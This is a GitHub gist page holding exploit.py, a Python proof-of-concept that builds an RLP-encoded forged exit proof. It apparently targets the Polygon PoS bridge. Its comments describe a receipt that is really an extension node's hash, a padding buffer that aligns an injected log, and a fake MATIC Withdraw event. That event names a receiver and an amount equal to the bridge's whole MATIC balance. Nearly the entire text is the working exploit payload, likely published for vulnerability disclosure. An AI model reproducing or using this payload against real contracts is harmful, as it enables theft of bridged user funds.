Skip to content

Instantly share code, notes, and snippets.

@hexens-kasper

hexens-kasper/exploit.py Secret

Created April 25, 2025 10:06
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save hexens-kasper/582a935d7380d0e0e6fdfcdb0f80b14f to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save hexens-kasper/582a935d7380d0e0e6fdfcdb0f80b14f to your computer and use it in GitHub Desktop.
Download ZIP
exploit.py
Raw
exploit.py
from rlp import encode
print(encode([
0x09c18f00, # checkpoint header number
bytes.fromhex( # Merkle proof for the block in the checkpoint
'4a01e6469ac2b72c1f1ff8f1e6ef3a097d8be76103612117b4da280710760e57fd733856d8e14f5e7e80dddaa299da368f2e407f085c4383a1e8d4993434e210a76b353c813c506402fe06d6845fe25dae1fd079e77d6268ae0d659ada72fe9ba1c706894efa3a461f5f639786ab218297b9336b86fbe6cd1c1f8a8a46e565675c950ffdbc87115c371ab36bc047465e71eb9e785c0a8ba7dfbde9116c3c57c9e93e2acf9ad7ac8d1a3c1fc161e25dcec5a16f5a54383c1775a5a95173940b2ecfe4eb135e3cbc26029d65a45a4d22798607e7abca14756e1cdaffc9e6ae4bb6dffadb374856e351304fb188df45d8e779b586fb8a995994ccfb356bb09754abc14613ad75752d6b0d2e12e360915e89cf896d0863b685605b6226256261375c'
),
0x0104884b, # block number
0x60f6e2ff, # block timestamp
bytes.fromhex( # Block transactions root
'7554f1231705203d4267458996252844ffb831cc03a33c8abf790ab08e45eb63'
),
bytes.fromhex( # Block receipt root
'b0c00b94ddee17557e21363f2a743edcf8c7fcb4ca06e331fa617ece4e758e7a'
),
bytes.fromhex( # Receipt (which is actually the extension node's hash)
'8cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205'
),
bytes.fromhex( # MPT proof to the extension node
'f901ccf90131a0c04d1a2cfe8fdf067af18383c3455cbcc44c774353121047929149a9145cfad8a068e5704bf5d951293b712f6d15affd737aabd7e6be7fff751cd2fbcbb20b247aa083888ac83329b481bb389821748c9ec10a19d12507a44b3c0c26dca18bda04dca00d88cff9167ce051c7cc77b685350d47dd26eb637a50c9d64e24822029a8f653a05dbfd66b811a34ba30d72aa93ca7e3012f221714065fb326857d23d4abe417c9a03fecc2ad9ba3c34cc8b3be67d1b4b1ff5623b9c92e25d563d8081c137b8e990ba05e12ccf34caf0eeeea3f5b5e36fd494878685af17715732b042e6e7d6534f7c2a0b26edfbfc6a0caf5ed26a0d27d6c51b600a30748db98d7897d38420ed0ffb27ca0e286fd36ff52c20772c4db850c8f2d7efa443f492608723646853e4e6edbc5728080808080808080f871a0f033bac053f5280c7938cabd1addaf4573d2588eb3b1e6e6ad7d5cd7456bbfa5a0d496eb962fc6a3548b45a1ddc27d16db0fa1bebd45fec668fb13b5119bfbf26ca05a32a0340bcda816eb25c89449694bcffcf01295d4606caeb09c7f74f6baaa8c8080808080808080808080808080e4820001a08cf8a384e97b4bf8c814e0be6e1c3573d267ffdf9b8ea8546ba5b5b9e5f2a205'
),
bytes.fromhex( # MPT proof path
'008201'
),
1, # Log index
57049 * b'\x00' + # Buffer to align the injected log with the jump
encode([
bytes.fromhex('0000000000000000000000000000000000001010'), # Emitter = MATIC on PoS
[
bytes.fromhex( # Withdraw event signature
'ebff2602b3f468259e1e99f613fed6691f3a6526effe6ef3e768ba7ae7a36c4f'
),
bytes.fromhex( # Root token (MATIC on mainnet)
'0000000000000000000000007D1AfA7B718fb893dB30A3aBc0Cfc608AaCfeBB0'
),
bytes.fromhex( # Receiver (standard Forge contract address)
'0000000000000000000000007FA9385bE102ac3EAc297483Dd6233D62b3e1496'
)
],
( # Amount = MATIC balance of bridge at block 20550962
1450861658108415095557765013
).to_bytes(32, 'big')
]) + \
b'\xbf\xff\xff\xff\xff\xff\xff\xff\xff' # End marker to stop the list parsing
]).hex())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment